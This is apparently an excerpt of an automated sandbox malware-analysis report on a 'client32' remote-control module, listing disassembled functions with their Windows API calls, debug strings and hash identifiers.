                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: SleepThread$CreateMessagePost
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3347742789-0
                                                                                                                                                                                • Opcode ID: 0a2770b55b125ea3dc9ba23ed43af86ae633bc9e1574e56639ec8dd40032f4b2
                                                                                                                                                                                • Instruction ID: 2ae3116f5df8233203c0b5b7c047d092e18a9fbb085bfb1a1d8cc4b180184980
                                                                                                                                                                                • Opcode Fuzzy Hash: 0a2770b55b125ea3dc9ba23ed43af86ae633bc9e1574e56639ec8dd40032f4b2
                                                                                                                                                                                • Instruction Fuzzy Hash: F331C576E43232EBE212DBD9CC80FB6B798A745B68F514135F928972C8D2706841CFD0
                                                                                                                                                                                Function 110B3700 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(0000002C,2520CF5D,?,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B372F
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B376F
                                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 110B37EA
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(0000002C), ref: 110B37F1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$Leave$EnterEvent
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3394196147-0
                                                                                                                                                                                • Opcode ID: 7a37dbc294bf6013022d54b38bcde055109864a18cda1e313aa947c272999e8c
                                                                                                                                                                                • Instruction ID: 8acebb29280036c6a802c58c088d91b2f5c0a2bed23f5f36a778171c733041f7
                                                                                                                                                                                • Opcode Fuzzy Hash: 7a37dbc294bf6013022d54b38bcde055109864a18cda1e313aa947c272999e8c
                                                                                                                                                                                • Instruction Fuzzy Hash: BC314A75A44B059FD325CF69C980B9AFBE4FB48314F10862EE85AC7B50EB34A850CB90
                                                                                                                                                                                Function 11043660 Relevance: 6.1, APIs: 4, Instructions: 84windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 110684E0: EnterCriticalSection.KERNEL32(?), ref: 1106858A
                                                                                                                                                                                • SendMessageA.USER32(?,000006D4,00000000,00000000), ref: 110436CA
                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 110436D1
                                                                                                                                                                                • IsWindow.USER32(00000000), ref: 110436DE
                                                                                                                                                                                • GetWindowRect.USER32(00000000,1104A5A0), ref: 110436F5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$CriticalEnterLongMessageRectSectionSend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3558565530-0
                                                                                                                                                                                • Opcode ID: 6c6906d601423007a5f66f10affd5cb23062956646d041feccf02ac3272acbff
                                                                                                                                                                                • Instruction ID: d8135c0911b88fc1f510a9c52ef20d21577c3519517ef8ed33f3b43d0edb38f0
                                                                                                                                                                                • Opcode Fuzzy Hash: 6c6906d601423007a5f66f10affd5cb23062956646d041feccf02ac3272acbff
                                                                                                                                                                                • Instruction Fuzzy Hash: 3121A276E45259ABD714CF94DA80B9DF7B8FB45724F204269E82597780DB30A900CB54
                                                                                                                                                                                Function 110653F0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 67COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • wsprintfA.USER32 ref: 1106543C
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                • CheckSelProc(%s), selcount=%d (!=0), session=%d, pc=%x, pd=%x, xrefs: 11065436
                                                                                                                                                                                • ..\ctl32\Connect.cpp, xrefs: 1106544D, 11065469
                                                                                                                                                                                • idata->selcount == 0, xrefs: 1106546E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                                                                                                                • String ID: ..\ctl32\Connect.cpp$CheckSelProc(%s), selcount=%d (!=0), session=%d, pc=%x, pd=%x$idata->selcount == 0
                                                                                                                                                                                • API String ID: 4180936305-1065012149
                                                                                                                                                                                • Opcode ID: 797d8468d9f65758ba5c0047f23bec682fe702a91fa6be70a353377432b9d2cd
                                                                                                                                                                                • Instruction ID: 551adee72c4eb4ef12252f27ba382b2cec7c85a18966f969f4aa26cb450e8a93
                                                                                                                                                                                • Opcode Fuzzy Hash: 797d8468d9f65758ba5c0047f23bec682fe702a91fa6be70a353377432b9d2cd
                                                                                                                                                                                • Instruction Fuzzy Hash: 1C21FD76B00619ABC715DE61D840BEAF7ECAB14319F00429DE99A57280DBB2BA44CB90
                                                                                                                                                                                Function 11065780 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 110657D5
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 11065809
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$EnterErrorExitLastLeaveMessageProcesswsprintf
                                                                                                                                                                                • String ID: ..\ctl32\Connect.cpp$idata->tr
                                                                                                                                                                                • API String ID: 4291042357-344713559
                                                                                                                                                                                • Opcode ID: 23c3da0324b276761641299c6b77111f7b82dc28d0ec62404ffe404f1c783c14
                                                                                                                                                                                • Instruction ID: 44757cc343339ca579ba43b50c33a0f9a5ae2e09939d2728e5a706d7875b16e3
                                                                                                                                                                                • Opcode Fuzzy Hash: 23c3da0324b276761641299c6b77111f7b82dc28d0ec62404ffe404f1c783c14
                                                                                                                                                                                • Instruction Fuzzy Hash: 48114875A00659AFE704CF94D981FEAFBA8FB49751F00422AF92593640D774B900CAA0
                                                                                                                                                                                Function 11143070 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 11143091
                                                                                                                                                                                • SetRect.USER32(?,?,?,?,?), ref: 111430A9
                                                                                                                                                                                • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111430C0
                                                                                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 111430C8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Color$RectText
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4034337308-0
                                                                                                                                                                                • Opcode ID: 1406050a0590d7c35e0c9d7bd2658671bf312bb981d1f242637fabc4b42883a5
                                                                                                                                                                                • Instruction ID: e9225e88152d902865c43eb673e3150d6d7e7d22167fd17714d79550e5345a2a
                                                                                                                                                                                • Opcode Fuzzy Hash: 1406050a0590d7c35e0c9d7bd2658671bf312bb981d1f242637fabc4b42883a5
                                                                                                                                                                                • Instruction Fuzzy Hash: 0C012C7264021CBBDB04DEA8DD81FEFB3ACEF49604F104159FA15A7280DAB0AD018BA5
                                                                                                                                                                                Function 110675A0 Relevance: 6.0, APIs: 4, Instructions: 48windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetEvent.KERNEL32 ref: 110675BB
                                                                                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 110675EC
                                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 110675F6
                                                                                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11067604
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$Peek$DispatchEvent
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4257095537-0
                                                                                                                                                                                • Opcode ID: 7c6026692a30b4ac7f152a41e84efb3a7702c885a69505d6705fd626bd364ec1
                                                                                                                                                                                • Instruction ID: aec9ad63bee144445ad482119ba180fbd35a23c038e7556534d76a428b5108da
                                                                                                                                                                                • Opcode Fuzzy Hash: 7c6026692a30b4ac7f152a41e84efb3a7702c885a69505d6705fd626bd364ec1
                                                                                                                                                                                • Instruction Fuzzy Hash: E701B171A40205ABE704DE94CC81F96B7ADAB88714F5001A5FA14AF1C5EBB5A541CBF0
                                                                                                                                                                                Function 111715A2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                                                                                                                                • __amsg_exit.LIBCMT ref: 111715CE
                                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 111715FB
                                                                                                                                                                                • _free.LIBCMT ref: 1117160E
                                                                                                                                                                                • InterlockedIncrement.KERNEL32(02621658), ref: 11171626
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement_free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 552504950-0
                                                                                                                                                                                • Opcode ID: 100627ac10354dfca0d49834c04db4f09fc8c26e8269036c781d278fdc3bb3a6
                                                                                                                                                                                • Instruction ID: 224c65a35f2b569fe2d6e63dca2a733826a481c10535b45dbfb9364d9a312d7f
                                                                                                                                                                                • Opcode Fuzzy Hash: 100627ac10354dfca0d49834c04db4f09fc8c26e8269036c781d278fdc3bb3a6
                                                                                                                                                                                • Instruction Fuzzy Hash: 3001C4369027229BEB029FA9858479DF761AB0271CF490015E820A7B84CB70A992DFD6
                                                                                                                                                                                Function 11065340 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 11065379
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 11065380
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                • idata->sendbytes + idata->sendpackets == 0 || idata->dead, xrefs: 1106535E
                                                                                                                                                                                • ..\ctl32\Connect.cpp, xrefs: 11065359
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$EnterErrorExitLastLeaveMessageProcesswsprintf
                                                                                                                                                                                • String ID: ..\ctl32\Connect.cpp$idata->sendbytes + idata->sendpackets == 0 || idata->dead
                                                                                                                                                                                • API String ID: 4291042357-2108837894
                                                                                                                                                                                • Opcode ID: a19464ccc32c24cf92dbf1829638b22786b6167e350d3f1922a7d4f2f88e924c
                                                                                                                                                                                • Instruction ID: de50fec2690bae72a9e63108db371d327a344f2e77017fbc78837a4d847ab462
                                                                                                                                                                                • Opcode Fuzzy Hash: a19464ccc32c24cf92dbf1829638b22786b6167e350d3f1922a7d4f2f88e924c
                                                                                                                                                                                • Instruction Fuzzy Hash: 14011AB6904F059BD320DBB4D844BE7B7E4BB8870AF04481CE6AE86141DBB57141CF94
                                                                                                                                                                                Function 1115F1F0 Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 1115F208
                                                                                                                                                                                • GlobalDeleteAtom.KERNEL32 ref: 1115F212
                                                                                                                                                                                • GlobalDeleteAtom.KERNEL32 ref: 1115F21C
                                                                                                                                                                                • SetWindowLongA.USER32(?,000000FC,?), ref: 1115F22C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
